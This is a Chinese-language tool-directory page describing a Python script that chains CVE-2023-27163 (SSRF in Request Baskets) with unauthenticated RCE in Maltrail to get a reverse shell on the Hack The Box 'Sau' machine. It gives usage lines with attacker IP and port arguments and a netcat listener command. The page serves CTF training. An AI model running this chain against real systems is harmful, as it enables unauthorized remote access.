Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
htb-sau-exploit-chain — HTB Sau 的自动化利用链 — CVE-2023-27163 (SSRF) + Maltrail 未授权 RCE → 反向 Shell | Kitploit
工具/GitHubGitHub/tombstoneghost/htb-sau-exploit-chain
Payload生成漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubtombstoneghost/htb-sau-exploit-chain

htb-sau-exploit-chain

HTB Sau 的自动化利用链 — CVE-2023-27163 (SSRF) + Maltrail 未授权 RCE → 反向 Shell

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
44个月前尚未审核

HTB Sau 漏洞利用链 — CVE-2023-27163 (SSRF) + Maltrail RCE 自动化

一个 Python 漏洞利用脚本,将 CVE-2023-27163(Request Baskets ≤ 1.2.1 中的服务端请求伪造)与 Maltrail 0.53 中的未经身份验证的远程代码执行漏洞串联起来,传递反向 shell。专为 Hack The Box 的 Sau 计算机设计。


📌 概述

该脚本自动化了在目标上获取初始访问权限所需的利用路径,步骤如下:

  1. 利用 CVE-2023-27163 获得一个可用的 bucket 端点
  2. 借助暴露的服务与 Maltrail 交互
  3. 触发 Maltrail 中的未经身份验证的 RCE
  4. 向攻击机传递反向 shell

⚙️ 用法

root@kitploit:~
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

示例:

root@kitploit:~
python3 exploit.py http://10.10.11.224 10.10.14.6 4444

🎧 Netcat 监听器(重要)

在运行漏洞利用之前,请在你的机器上启动一个监听器以捕获反向 shell:

root@kitploit:~
nc -lvnp <LISTENER_PORT>

示例:

root@kitploit:~
nc -lvnp 4444

🧩 参数

参数描述
TARGET_URL目标的基本 URL(例如 http://IP)
LISTENER_IP你的攻击机 IP
LISTENER_PORT接收反向 shell 的端口

🚀 利用流程

  • 规范化目标 URL
  • 触发 CVE-2023-27163 创建/访问一个 request basket
  • 提取可访问的端点(bucket_url)
  • 使用该 bucket 与 Maltrail 交互
  • 执行载荷以生成反向 shell

⚠️ 注意事项

  • 请确保在运行脚本 之前 你的监听器已在运行
  • 从目标 URL 中移除末尾的 /(脚本会自动处理)
  • 专为 HTB Sau 计算机设计——可能不适用于其他环境

📚 参考

  • CVE-2023-27163 (Request Baskets)
  • Maltrail 未经身份验证的 RCE

🛑 免责声明

本项目仅用于 教育目的 以及在 授权环境(如 Hack The Box)中使用。未经适当许可,不得用于任何系统。

下载工具